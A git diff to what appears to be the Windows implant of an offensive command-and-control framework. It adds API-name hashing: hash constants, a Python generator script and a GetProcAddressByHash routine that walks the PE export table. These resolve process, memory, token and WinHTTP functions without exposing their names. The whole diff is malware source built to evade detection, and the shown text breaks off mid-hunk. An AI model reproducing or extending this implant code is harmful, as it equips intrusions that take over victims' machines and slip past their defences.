diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp index 37796c8..b4eff28 100644 --- a/payload/win/implant/include/core/procs.hpp +++ b/payload/win/implant/include/core/procs.hpp @@ -12,6 +12,84 @@ #include #include +#define APIHASH_LDRLOADDLL 0x19cb5e59 +#define APIHASH_NTFLUSHINSTRUCTIONCACHE 0x3a43951d +#define APIHASH_NTCREATEPROCESSEX 0xbd003d8b +#define APIHASH_NTOPENPROCESS 0x64e24f6a +#define APIHASH_NTOPENPROCESSTOKEN 0xcdd9f7af +#define APIHASH_NTTERMINATEPROCESS 0xc58a7b49 +#define APIHASH_NTQUERYINFORMATIONPROCESS 0xa79c59b0 +#define APIHASH_NTSETINFORMATIONPROCESS 0xb5d02d0a +#define APIHASH_NTCREATETHREADEX 0x2afc9934 +#define APIHASH_NTOPENTHREAD 0xa58f60af +#define APIHASH_NTRESUMETHREAD 0x8bad8d92 +#define APIHASH_NTGETCONTEXTTHREAD 0x904d345e +#define APIHASH_NTSETCONTEXTTHREAD 0x25df9cd2 +#define APIHASH_NTALLOCATEVIRTUALMEMORY 0xf8829394 +#define APIHASH_NTREADVIRTUALMEMORY 0x88bc3b5b +#define APIHASH_NTWRITEVIRTUALMEMORY 0x7c61e008 +#define APIHASH_NTPROTECTVIRTUALMEMORY 0xa7df2bd8 +#define APIHASH_NTFREEVIRTUALMEMORY 0xb6eb4645 +#define APIHASH_NTDUPLICATEOBJECT 0xae23334f +#define APIHASH_NTWAITFORSINGLEOBJECT 0x73c87a00 +#define APIHASH_NTCLOSE 0x6f18e5dd +#define APIHASH_NTCREATEFILE 0x2f4d94d3 +#define APIHASH_NTOPENFILE 0x740aa9e1 +#define APIHASH_NTREADFILE 0xc363b2ad +#define APIHASH_NTWRITEFILE 0x9339e2e0 +#define APIHASH_NTDELETEFILE 0xcd2f2302 +#define APIHASH_NTCREATENAMEDPIPEFILE 0x333974ac +#define APIHASH_NTQUERYINFORMATIONFILE 0x6226c85b +#define APIHASH_NTSETINFORMATIONFILE 0x52a8041 +#define APIHASH_NTQUERYINFORMATIONTOKEN 0x8a713c7a +#define APIHASH_NTQUERYSYSTEMINFORMATION 0x1bfabb50 +#define APIHASH_NTSYSTEMDEBUGCONTROL 0x4def6394 +#define APIHASH_NTPRIVILEGECHECK 0x73129112 +#define APIHASH_NTADJUSTPRIVILEGESTOKEN 0x1b79f58d +#define APIHASH_NTOPENKEYEX 0x16b3e52d +#define APIHASH_NTQUERYKEY 0x43da72 +#define APIHASH_NTENUMERATEVALUEKEY 0xa153b717 +#define APIHASH_NTUNMAPVIEWOFSECTION 0x574e9fc1 +#define APIHASH_RTLALLOCATEHEAP 0xcc7755e +#define APIHASH_RTLZEROMEMORY 0x899c0d1e +#define APIHASH_RTLINITUNICODESTRING 0x4dc9caa9 +#define APIHASH_RTLSTRINGCCHCATW 0x2deef223 +#define APIHASH_RTLSTRINGCCHCOPYW 0x32231e60 +#define APIHASH_RTLSTRINGCCHLENGTHW 0x28821d8f +#define APIHASH_RTLQUERYSYSTEMINFORMATION 0xf6044a6a +#define APIHASH_RTLEXPANDENVIRONMENTSTRINGS 0xb73f443e +#define APIHASH_RTLGETCURRENTDIRECTORY_U 0x4a121ccb +#define APIHASH_RTLSETCURRENTDIRECTORY_U 0x4cd546d7 +#define APIHASH_RTLGETFULLPATHNAME_U 0x2116c216 +#define APIHASH_LOADLIBRARYA 0x7069f241 +#define APIHASH_LOADLIBRARYW 0x7069f257 +#define APIHASH_GETPROCADDRESS 0xafa3e09d +#define APIHASH_CREATETHREADPOOLWAIT 0x7a8370ac +#define APIHASH_SETTHREADPOOLWAIT 0x5f2a3808 +#define APIHASH_WINHTTPOPEN 0x97451379 +#define APIHASH_QUERYFULLPROCESSIMAGENAMEW 0xa6e1683e +#define APIHASH_RTLADDFUNCTIONTABLE 0xbe7f92ca +#define APIHASH_DLLMAIN 0xe2e2f348 +#define APIHASH_VIRTUALALLOC 0x5ae0dabf +#define APIHASH_VIRTUALPROTECT 0x927857d9 +#define APIHASH_VIRTUALFREE 0x640675a2 +#define APIHASH_CLOSEHANDLE 0x47bdd9cb +#define APIHASH_SETFILEINFORMATIONBYHANDLE 0xbfea4fe2 +#define APIHASH_MESSAGEBOXA 0xcc4a1d08 +#define APIHASH_WINHTTPCONNECT 0xe18b30db +#define APIHASH_WINHTTPOPENREQUEST 0xd6cffcd6 +#define APIHASH_WINHTTPSETOPTION 0x48ed79a8 +#define APIHASH_WINHTTPSENDREQUEST 0x79792358 +#define APIHASH_WINHTTPWRITEDATA 0xeed55fda +#define APIHASH_WINHTTPRECEIVERESPONSE 0x66131eb5 +#define APIHASH_WINHTTPQUERYHEADERS 0xe17c65cd +#define APIHASH_WINHTTPQUERYDATAAVAILABLE 0xff301fc6 +#define APIHASH_WINHTTPREADDATA 0x70389c8f +#define APIHASH_WINHTTPCLOSEHANDLE 0x22081731 + +#define HASH_IV 0x35 +#define RANDOM_ADDR 0xab10f29f + typedef struct _PS_ATTRIBUTE { ULONG_PTR Attribute; @@ -47,6 +125,8 @@ namespace Procs typedef NTSTATUS (NTAPI* LPPROC_NTOPENPROCESSTOKEN)(HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle); // NtTerminateProcess typedef NTSTATUS (NTAPI* LPPROC_NTTERMINATEPROCESS)(HANDLE ProcessHandle, NTSTATUS ExitStatus); + // NtQueryInformationProcess + typedef NTSTATUS (NTAPI* LPPROC_NTQUERYINFORMATIONPROCESS)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); // NtSetInformationProcess typedef NTSTATUS (NTAPI* LPPROC_NTSETINFORMATIONPROCESS)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength); // NtCreateThreadEx @@ -85,8 +165,6 @@ namespace Procs typedef NTSTATUS (NTAPI* LPPROC_NTDELETEFILE)(POBJECT_ATTRIBUTES ObjectAttributes); // NtCreateNamedPipeFile typedef NTSTATUS (NTAPI* LPPROC_NTCREATENAMEDPIPEFILE)(PHANDLE FileHandle, ULONG DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, ULONG NamedPipeType, ULONG ReadMode, ULONG CompletionMode, ULONG MaximumInstances, ULONG InboundQuota, ULONG OutboundQuota, PLARGE_INTEGER DefaultTimeout); - // NtQueryInformationProcess - typedef NTSTATUS (NTAPI* LPPROC_NTQUERYINFORMATIONPROCESS)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); // NtQueryInformationFile typedef NTSTATUS (NTAPI* LPPROC_NTQUERYINFORMATIONFILE)(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass); // NtSetInformationFile @@ -113,9 +191,11 @@ namespace Procs // **NATIVE APIs (RUNTIME LIBRARY)** // RtlAllocateHeap typedef PVOID (NTAPI* LPPROC_RTLALLOCATEHEAP)(PVOID HeapHandle, ULONG Flags, SIZE_T Size); + // RtlZeroMemory + typedef VOID (NTAPI* LPPROC_RTLZEROMEMORY)(PVOID Destination, SIZE_T Length); // RtlInitUnicodeString typedef NTSTATUS (NTAPI* LPPROC_RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString, PCWSTR SourceString); - // RtlStringCatW + // RtlStringCchCatW typedef NTSTATUS (NTAPI* LPPROC_RTLSTRINGCCHCATW)(LPWSTR pszDest, SIZE_T cchDest, LPCWSTR pszSrc); // RtlStringCchCopyW typedef NTSTATUS (NTAPI* LPPROC_RTLSTRINGCCHCOPYW)(LPWSTR pszDest, SIZE_T cchDest, LPCWSTR pszSrc); @@ -151,7 +231,7 @@ namespace Procs typedef BOOL (WINAPI* LPPROC_VIRTUALPROTECT)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); // VirtualFree typedef BOOL (WINAPI* LPPROC_VIRTUALFREE)(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); - // closeHandle + // CloseHandle typedef BOOL (WINAPI* LPPROC_CLOSEHANDLE)(HANDLE hObject); // SetFileInformationByHandle typedef BOOL (WINAPI* LPPROC_SETFILEINFORMATIONBYHANDLE)(HANDLE hFile, FILE_INFO_BY_HANDLE_CLASS FileInformationClass, LPVOID lpFileInformation, DWORD dwBufferSize); @@ -221,6 +301,7 @@ namespace Procs // **RUNTIME LIBRARY APIs** LPPROC_RTLALLOCATEHEAP lpRtlAllocateHeap = nullptr; + LPPROC_RTLZEROMEMORY lpRtlZeroMemory = nullptr; LPPROC_RTLINITUNICODESTRING lpRtlInitUnicodeString = nullptr; LPPROC_RTLSTRINGCCHCATW lpRtlStringCchCatW = nullptr; LPPROC_RTLSTRINGCCHCOPYW lpRtlStringCchCopyW = nullptr; @@ -285,9 +366,6 @@ namespace Procs Syscalls::SYSCALL sysRtlAllocateHeap = {0}; Syscalls::SYSCALL sysRtlInitUnicodeString = {0}; - Syscalls::SYSCALL sysRtlStringCchCatW = {0}; - Syscalls::SYSCALL sysRtlStringCchCopyW = {0}; - Syscalls::SYSCALL sysRtlStringCchLengthW = {0}; Syscalls::SYSCALL sysRtlQuerySystemInformation = {0}; Syscalls::SYSCALL sysRtlExpandEnvironmentStrings = {0}; Syscalls::SYSCALL sysRtlGetCurrentDirectory_U = {0}; @@ -296,6 +374,11 @@ namespace Procs }; typedef PROCS* PPROCS; + DWORD GetHashFromString(char* str); + PVOID GetProcAddressByHash( + HMODULE hModule, + DWORD dwHash + ); PPROCS FindProcs( HMODULE hNTDLL, HMODULE hKernel32DLL, diff --git a/payload/win/implant/include/core/syscalls.hpp b/payload/win/implant/include/core/syscalls.hpp index eca7567..5d9e6b6 100644 --- a/payload/win/implant/include/core/syscalls.hpp +++ b/payload/win/implant/include/core/syscalls.hpp @@ -39,7 +39,7 @@ namespace Syscalls }; typedef SYSCALL* PSYSCALL; - SYSCALL FindSyscall(HMODULE hNTDLL, LPCSTR lpNtFunc); + SYSCALL FindSyscall(UINT_PTR pNtFuncAddr); } #endif // HERMIT_CORE_SYSCALLS_HPP \ No newline at end of file diff --git a/payload/win/implant/script/calc_api_hash.py b/payload/win/implant/script/calc_api_hash.py new file mode 100644 index 0000000..702a630 --- /dev/null +++ b/payload/win/implant/script/calc_api_hash.py @@ -0,0 +1,125 @@ +from typing import Mapping + +APIS = [ + # NATIVE APIS + "LdrLoadDll", + "NtFlushInstructionCache", + "NtCreateProcessEx", + "NtOpenProcess", + "NtOpenProcessToken", + "NtTerminateProcess", + "NtQueryInformationProcess", + "NtSetInformationProcess", + "NtCreateThreadEx", + "NtOpenThread", + "NtResumeThread", + "NtGetContextThread", + "NtSetContextThread", + "NtAllocateVirtualMemory", + "NtReadVirtualMemory", + "NtWriteVirtualMemory", + "NtProtectVirtualMemory", + "NtFreeVirtualMemory", + "NtDuplicateObject", + "NtWaitForSingleObject", + "NtClose", + "NtCreateFile", + "NtOpenFile", + "NtReadFile", + "NtWriteFile", + "NtDeleteFile", + "NtCreateNamedPipeFile", + "NtQueryInformationFile", + "NtSetInformationFile", + "NtQueryInformationToken", + "NtQuerySystemInformation", + "NtSystemDebugControl", + "NtPrivilegeCheck", + "NtAdjustPrivilegesToken", + "NtOpenKeyEx", + "NtQueryKey", + "NtEnumerateValueKey", + "NtUnmapViewOfSection", + # NATIVE APIS (RUNTIME LIBRARY) + "RtlAllocateHeap", + "RtlZeroMemory", + "RtlInitUnicodeString", + "RtlStringCchCatW", + "RtlStringCchCopyW", + "RtlStringCchLengthW", + "RtlQuerySystemInformation", + "RtlExpandEnvironmentStrings", + "RtlGetCurrentDirectory_U", + "RtlSetCurrentDirectory_U", + "RtlGetFullPathName_U", + # WINAPIS + "LoadLibraryA", + "LoadLibraryW", + "GetProcAddress", + "CreateThreadpoolWait", + "SetThreadpoolWait", + "WinHttpOpen", + "QueryFullProcessImageNameW", + "RtlAddFunctionTable", + "DllMain", + "VirtualAlloc", + "VirtualProtect", + "VirtualFree", + "CloseHandle", + "SetFileInformationByHandle", + "MessageBoxA", + "WinHttpConnect", + "WinHttpOpenRequest", + "WinHttpSetOption", + "WinHttpSendRequest", + "WinHttpWriteData", + "WinHttpReceiveResponse", + "WinHttpQueryHeaders", + "WinHttpQueryDataAvailable", + "WinHttpReadData", + "WinHttpCloseHandle" +] + +HASH_IV = 0x35 +RANDOM_ADDR = 0xab10f29f + +def calc_hash(string: str) -> int: + str_length = len(string) + hash = HASH_IV + + for s in string: + # hash = ((hash << 5) + hash) + ord(s) + hash = hash * RANDOM_ADDR + ord(s) + + return hash & 0xFFFFFFFF + + +def is_dupl(hashes: Mapping[str, str], hash: str) -> bool: + for v in hashes.values(): + if v == hash: + return True + return False + + +def main(): + hashes = {} + for api in APIS: + hash_value = calc_hash(api) + hash_fmt = f"{'0x{0:x}'.format(hash_value)}" + + # Check if the hash is duplicate + if is_dupl(hashes, hash_fmt) is True: + print("The calculated hash is duplicate. Please try again.") + return + + hashes[f"#define APIHASH_{api.upper()}"] = hash_fmt + + max_length = max(len(api_name) for api_name in hashes.keys()) + + for api_name, api_hash in hashes.items(): + print(f"{api_name.ljust(max_length)} {api_hash}") + + +if __name__ == "__main__": + print("Set the following defines to a header file such as 'procs.hpp'.\n") + main() diff --git a/payload/win/implant/src/core/procs.cpp b/payload/win/implant/src/core/procs.cpp index b37f138..44a73ba 100644 --- a/payload/win/implant/src/core/procs.cpp +++ b/payload/win/implant/src/core/procs.cpp @@ -2,6 +2,56 @@ namespace Procs { + DWORD GetHashFromString(char* str) + { + size_t dwStringLength = strlen(str); + DWORD dwHash = HASH_IV; + + for (size_t i = 0; i < dwStringLength; i++) + { + dwHash = dwHash * RANDOM_ADDR + static_cast(str[i]); + } + + return dwHash & 0xFFFFFFFF; + } + + PVOID GetProcAddressByHash( + HMODULE hModule, + DWORD dwHash + ) { + PVOID pFuncAddr = nullptr; + + PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; + PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hModule + pDosHeader->e_lfanew); + + DWORD_PTR dwpExportDirRVA = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; + + PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)hModule + dwpExportDirRVA); + + PDWORD pdwAddrOfFuncsRVA = (PDWORD)((DWORD_PTR)hModule + pExportDir->AddressOfFunctions); + PDWORD pdwAddrOfNamesRVA = (PDWORD)((DWORD_PTR)hModule + pExportDir->AddressOfNames); + PWORD pdwAddrOfNameOrdinalsRVA = (PWORD)((DWORD_PTR)hModule + pExportDir->AddressOfNameOrdinals); + + for (DWORD i = 0; i < pExportDir->NumberOfFunctions; i++) + { + DWORD dwFuncNameRVA = pdwAddrOfNamesRVA[i]; + DWORD_PTR dwpFuncNameRVA = (DWORD_PTR)hModule + dwFuncNameRVA; + char* sFuncName = (char*)dwpFuncNameRVA; + DWORD_PTR dwpFuncAddrRVA = 0; + + DWORD dwFuncNameHash = GetHashFromString(sFuncName); + if (dwFuncNameHash == dwHash) + { + dwpFuncAddrRVA = pdwAddrOfFuncsRVA[pdwAddrOfNameOrdinalsRVA[i]]; + pFuncAddr = (PVOID)((DWORD_PTR)hModule + dwpFuncAddrRVA); + return pFuncAddr; + } + } + + return nullptr; + } + + PPROCS FindProcs( HMODULE hNTDLL, HMODULE hKernel32DLL, @@ -11,111 +61,165 @@ namespace Procs PPROCS pProcs = new PROCS; // NT APIs - pProcs->lpNtCreateProcessEx = reinterpret_cast(GetProcAddress(hNTDLL, "NtCreateProcessEx")); - pProcs->lpNtOpenProcess = reinterpret_cast(GetProcAddress(hNTDLL, "NtOpenProcess")); - pProcs->lpNtOpenProcessToken = reinterpret_cast(GetProcAddress(hNTDLL, "NtOpenProcessToken")); - pProcs->lpNtTerminateProcess = reinterpret_cast(GetProcAddress(hNTDLL, "NtTerminateProcess")); - pProcs->lpNtCreateThreadEx = reinterpret_cast(GetProcAddress(hNTDLL, "NtCreateThreadEx")); - pProcs->lpNtResumeThread = reinterpret_cast(GetProcAddress(hNTDLL, "NtResumeThread")); - pProcs->lpNtGetContextThread = reinterpret_cast(GetProcAddress(hNTDLL, "NtGetContextThread")); - pProcs->lpNtSetContextThread = reinterpret_cast(GetProcAddress(hNTDLL, "NtSetContextThread")); - pProcs->lpNtAllocateVirtualMemory = reinterpret_cast(GetProcAddress(hNTDLL, "NtAllocateVirtualMemory")); - pProcs->lpNtReadVirtualMemory = reinterpret_cast(GetProcAddress(hNTDLL, "NtReadVirtualMemory")); - pProcs->lpNtWriteVirtualMemory = reinterpret_cast(GetProcAddress(hNTDLL, "NtWriteVirtualMemory")); - pProcs->lpNtProtectVirtualMemory = reinterpret_cast(GetProcAddress(hNTDLL, "NtProtectVirtualMemory")); - pProcs->lpNtFreeVirtualMemory = reinterpret_cast(GetProcAddress(hNTDLL, "NtFreeVirtualMemory")); - pProcs->lpNtDuplicateObject = reinterpret_cast(GetProcAddress(hNTDLL, "NtDuplicateObject")); - pProcs->lpNtWaitForSingleObject = reinterpret_cast(GetProcAddress(hNTDLL, "NtWaitForSingleObject")); - pProcs->lpNtClose = reinterpret_cast(GetProcAddress(hNTDLL, "NtClose")); - pProcs->lpNtCreateFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtCreateFile")); - pProcs->lpNtOpenFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtOpenFile")); - pProcs->lpNtReadFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtReadFile")); - pProcs->lpNtWriteFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtWriteFile")); - pProcs->lpNtDeleteFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtDeleteFile")); - pProcs->lpNtCreateNamedPipeFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtCreateNamedPipeFile")); - pProcs->lpNtQueryInformationProcess = reinterpret_cast(GetProcAddress(hNTDLL, "NtQueryInformationProcess")); - pProcs->lpNtQueryInformationFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtQueryInformationFile")); - pProcs->lpNtSetInformationFile = reinterpret_cast(GetProcAddress(hNTDLL, "NtSetInformationFile")); - pProcs->lpNtQueryInformationToken = reinterpret_cast(GetProcAddress(hNTDLL, "NtQueryInformationToken")); - pProcs->lpNtQuerySystemInformation = reinterpret_cast(GetProcAddress(hNTDLL, "NtQuerySystemInformation")); - pProcs->lpNtSystemDebugControl = reinterpret_cast(GetProcAddress(hNTDLL, "NtSystemDebugControl")); - pProcs->lpNtPrivilegeCheck = reinterpret_cast(GetProcAddress(hNTDLL, "NtPrivilegeCheck")); - pProcs->lpNtAdjustPrivilegesToken = reinterpret_cast(GetProcAddress(hNTDLL, "NtAdjustPrivilegesToken")); - pProcs->lpNtOpenKeyEx = reinterpret_cast(GetProcAddress(hNTDLL, "NtOpenKeyEx")); - pProcs->lpNtQueryKey = reinterpret_cast(GetProcAddress(hNTDLL, "NtQueryKey")); - pProcs->lpNtEnumerateValueKey = reinterpret_cast(GetProcAddress(hNTDLL, "NtEnumerateValueKey")); - pProcs->lpNtUnmapViewOfSection = reinterpret_cast(GetProcAddress(hNTDLL, "NtUnmapViewOfSection")); + PVOID pNtCreateProcessEx = GetProcAddressByHash(hNTDLL, APIHASH_NTCREATEPROCESSEX); + pProcs->lpNtCreateProcessEx = reinterpret_cast(pNtCreateProcessEx); + PVOID pNtOpenProcess = GetProcAddressByHash(hNTDLL, APIHASH_NTOPENPROCESS); + pProcs->lpNtOpenProcess = reinterpret_cast(pNtOpenProcess); + PVOID pNtOpenProcessToken = GetProcAddressByHash(hNTDLL, APIHASH_NTOPENPROCESSTOKEN); + pProcs->lpNtOpenProcessToken = reinterpret_cast(pNtOpenProcessToken); + PVOID pNtTerminateProcess = GetProcAddressByHash(hNTDLL, APIHASH_NTTERMINATEPROCESS); + pProcs->lpNtTerminateProcess = reinterpret_cast(pNtTerminateProcess); + PVOID pNtQueryInformationProcess = GetProcAddressByHash(hNTDLL, APIHASH_NTQUERYINFORMATIONPROCESS); + pProcs->lpNtQueryInformationProcess = reinterpret_cast(pNtQueryInformationProcess); + PVOID pNtCreateThreadEx = GetProcAddressByHash(hNTDLL, APIHASH_NTCREATETHREADEX); + pProcs->lpNtCreateThreadEx = reinterpret_cast(pNtCreateThreadEx); + PVOID pNtResumeThread = GetProcAddressByHash(hNTDLL, APIHASH_NTRESUMETHREAD); + pProcs->lpNtResumeThread = reinterpret_cast(pNtResumeThread); + PVOID pNtGetContextThread = GetProcAddressByHash(hNTDLL, APIHASH_NTGETCONTEXTTHREAD); + pProcs->lpNtGetContextThread = reinterpret_cast(pNtGetContextThread); + PVOID pNtSetContextThread = GetProcAddressByHash(hNTDLL, APIHASH_NTSETCONTEXTTHREAD); + pProcs->lpNtSetContextThread = reinterpret_cast(pNtSetContextThread); + PVOID pNtAllocateVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTALLOCATEVIRTUALMEMORY); + pProcs->lpNtAllocateVirtualMemory = reinterpret_cast(pNtAllocateVirtualMemory); + PVOID pNtReadVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTREADVIRTUALMEMORY); + pProcs->lpNtReadVirtualMemory = reinterpret_cast(pNtReadVirtualMemory); + PVOID pNtWriteVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTWRITEVIRTUALMEMORY); + pProcs->lpNtWriteVirtualMemory = reinterpret_cast(pNtWriteVirtualMemory); + PVOID pNtProtectVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTPROTECTVIRTUALMEMORY); + pProcs->lpNtProtectVirtualMemory = reinterpret_cast(pNtProtectVirtualMemory); + PVOID pNtFreeVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTFREEVIRTUALMEMORY); + pProcs->lpNtFreeVirtualMemory = reinterpret_cast(pNtFreeVirtualMemory); + PVOID pNtDuplicateObject = GetProcAddressByHash(hNTDLL, APIHASH_NTDUPLICATEOBJECT); + pProcs->lpNtDuplicateObject = reinterpret_cast(pNtDuplicateObject); + PVOID pNtWaitForSingleObject = GetProcAddressByHash(hNTDLL, APIHASH_NTWAITFORSINGLEOBJECT); + pProcs->lpNtWaitForSingleObject = reinterpret_cast(pNtWaitForSingleObject); + PVOID pNtClose = GetProcAddressByHash(hNTDLL, APIHASH_NTCLOSE); + pProcs->lpNtClose = reinterpret_cast(pNtClose); + PVOID pNtCreateFile = GetProcAddressByHash(hNTDLL, APIHASH_NTCREATEFILE); + pProcs->lpNtCreateFile = reinterpret_cast(pNtCreateFile); + PVOID pNtOpenFile = GetProcAddressByHash(hNTDLL, APIHASH_NTOPENFILE); + pProcs->lpNtOpenFile = reinterpret_cast(pNtOpenFile); + PVOID pNtReadFile = GetProcAddressByHash(hNTDLL, APIHASH_NTREADFILE); + pProcs->lpNtReadFile = reinterpret_cast(pNtReadFile); + PVOID pNtWriteFile = GetProcAddressByHash(hNTDLL, APIHASH_NTWRITEFILE); + pProcs->lpNtWriteFile = reinterpret_cast(pNtWriteFile); + PVOID pNtDeleteFile = GetProcAddressByHash(hNTDLL, APIHASH_NTDELETEFILE); + pProcs->lpNtDeleteFile = reinterpret_cast(pNtDeleteFile); + PVOID pNtCreateNamedPipeFile = GetProcAddressByHash(hNTDLL, APIHASH_NTCREATENAMEDPIPEFILE); + pProcs->lpNtCreateNamedPipeFile = reinterpret_cast(pNtCreateNamedPipeFile); + PVOID pNtQueryInformationFile = GetProcAddressByHash(hNTDLL, APIHASH_NTQUERYINFORMATIONFILE); + pProcs->lpNtQueryInformationFile = reinterpret_cast(pNtQueryInformationFile); + PVOID pNtSetInformationFile = GetProcAddressByHash(hNTDLL, APIHASH_NTSETINFORMATIONFILE); + pProcs->lpNtSetInformationFile = reinterpret_cast(pNtSetInformationFile); + PVOID pNtQueryInformationToken = GetProcAddressByHash(hNTDLL, APIHASH_NTQUERYINFORMATIONTOKEN); + pProcs->lpNtQueryInformationToken = reinterpret_cast(pNtQueryInformationToken); + PVOID pNtQuerySystemInformation = GetProcAddressByHash(hNTDLL, APIHASH_NTQUERYSYSTEMINFORMATION); + pProcs->lpNtQuerySystemInformation = reinterpret_cast(pNtQuerySystemInformation); + PVOID pNtSystemDebugControl = GetProcAddressByHash(hNTDLL, APIHASH_NTSYSTEMDEBUGCONTROL); + pProcs->lpNtSystemDebugControl = reinterpret_cast(pNtSystemDebugControl); + PVOID pNtPrivilegeCheck = GetProcAddressByHash(hNTDLL, APIHASH_NTPRIVILEGECHECK); + pProcs->lpNtPrivilegeCheck = reinterpret_cast(pNtPrivilegeCheck); + PVOID pNtAdjustPrivilegesToken = GetProcAddressByHash(hNTDLL, APIHASH_NTADJUSTPRIVILEGESTOKEN); + pProcs->lpNtAdjustPrivilegesToken = reinterpret_cast(pNtAdjustPrivilegesToken); + PVOID pNtOpenKeyEx = GetProcAddressByHash(hNTDLL, APIHASH_NTOPENKEYEX); + pProcs->lpNtOpenKeyEx = reinterpret_cast(pNtOpenKeyEx); + PVOID pNtQueryKey = GetProcAddressByHash(hNTDLL, APIHASH_NTQUERYKEY); + pProcs->lpNtQueryKey = reinterpret_cast(pNtQueryKey); + PVOID pNtEnumerateValueKey = GetProcAddressByHash(hNTDLL, APIHASH_NTENUMERATEVALUEKEY); + pProcs->lpNtEnumerateValueKey = reinterpret_cast(pNtEnumerateValueKey); + PVOID pNtUnmapViewOfSection = GetProcAddressByHash(hNTDLL, APIHASH_NTUNMAPVIEWOFSECTION); + pProcs->lpNtUnmapViewOfSection = reinterpret_cast(pNtUnmapViewOfSection); // NT APIs (Runtime Library) - pProcs->lpRtlAllocateHeap = reinterpret_cast(GetProcAddress(hNTDLL, "RtlAllocateHeap")); - pProcs->lpRtlInitUnicodeString = reinterpret_cast(GetProcAddress(hNTDLL, "RtlInitUnicodeString")); - pProcs->lpRtlStringCchCatW = reinterpret_cast(GetProcAddress(hNTDLL, "RtlStringCchCatW")); - pProcs->lpRtlStringCchCopyW = reinterpret_cast(GetProcAddress(hNTDLL, "RtlStringCchCopyW")); - pProcs->lpRtlStringCchLengthW = reinterpret_cast(GetProcAddress(hNTDLL, "RtlStringCchLengthW")); - pProcs->lpRtlGetCurrentDirectory_U = reinterpret_cast(GetProcAddress(hNTDLL, "RtlGetCurrentDirectory_U")); - pProcs->lpRtlSetCurrentDirectory_U = reinterpret_cast(GetProcAddress(hNTDLL, "RtlSetCurrentDirectory_U")); - pProcs->lpRtlGetFullPathName_U = reinterpret_cast(GetProcAddress(hNTDLL, "RtlGetFullPathName_U")); + PVOID pRtlAllocateHeap = GetProcAddressByHash(hNTDLL, APIHASH_RTLALLOCATEHEAP); + pProcs->lpRtlAllocateHeap = reinterpret_cast(pRtlAllocateHeap); + PVOID pRtlZeroMemory = GetProcAddressByHash(hNTDLL, APIHASH_RTLZEROMEMORY); + pProcs->lpRtlZeroMemory = reinterpret_cast(pRtlZeroMemory); + PVOID pRtlInitUnicodeString = GetProcAddressByHash(hNTDLL, APIHASH_RTLINITUNICODESTRING); + pProcs->lpRtlInitUnicodeString = reinterpret_cast(pRtlInitUnicodeString); + PVOID pRtlStringCchCatW = GetProcAddressByHash(hNTDLL, APIHASH_RTLSTRINGCCHCATW); + pProcs->lpRtlStringCchCatW = reinterpret_cast(pRtlStringCchCatW); + PVOID pRtlStringCchCopyW = GetProcAddressByHash(hNTDLL, APIHASH_RTLSTRINGCCHCOPYW); + pProcs->lpRtlStringCchCopyW = reinterpret_cast(pRtlStringCchCopyW); + PVOID pRtlStringCchLengthW = GetProcAddressByHash(hNTDLL, APIHASH_RTLSTRINGCCHLENGTHW); + pProcs->lpRtlStringCchLengthW = reinterpret_cast(pRtlStringCchLengthW); + PVOID pRtlGetCurrentDirectory_U = GetProcAddressByHash(hNTDLL, APIHASH_RTLGETCURRENTDIRECTORY_U); + pProcs->lpRtlGetCurrentDirectory_U = reinterpret_cast(pRtlGetCurrentDirectory_U); + PVOID pRtlSetCurrentDirectory_U = GetProcAddressByHash(hNTDLL, APIHASH_RTLSETCURRENTDIRECTORY_U); + pProcs->lpRtlSetCurrentDirectory_U = reinterpret_cast(pRtlSetCurrentDirectory_U); + PVOID pRtlGetFullPathName_U = GetProcAddressByHash(hNTDLL, APIHASH_RTLGETFULLPATHNAME_U); + pProcs->lpRtlGetFullPathName_U = reinterpret_cast(pRtlGetFullPathName_U); // WINAPIs + PVOID pQueryFullProcessImageNameW = GetProcAddressByHash(hKernel32DLL, APIHASH_QUERYFULLPROCESSIMAGENAMEW); pProcs->lpQueryFullProcessImageNameW = reinterpret_cast(GetProcAddress(hKernel32DLL, "QueryFullProcessImageNameW")); - pProcs->lpSetFileInformationByHandle = reinterpret_cast(GetProcAddress(hKernel32DLL, "SetFileInformationByHandle")); - pProcs->lpWinHttpOpen = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpOpen")); - pProcs->lpWinHttpConnect = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpConnect")); - pProcs->lpWinHttpOpenRequest = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpOpenRequest")); - pProcs->lpWinHttpSetOption = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpSetOption")); - 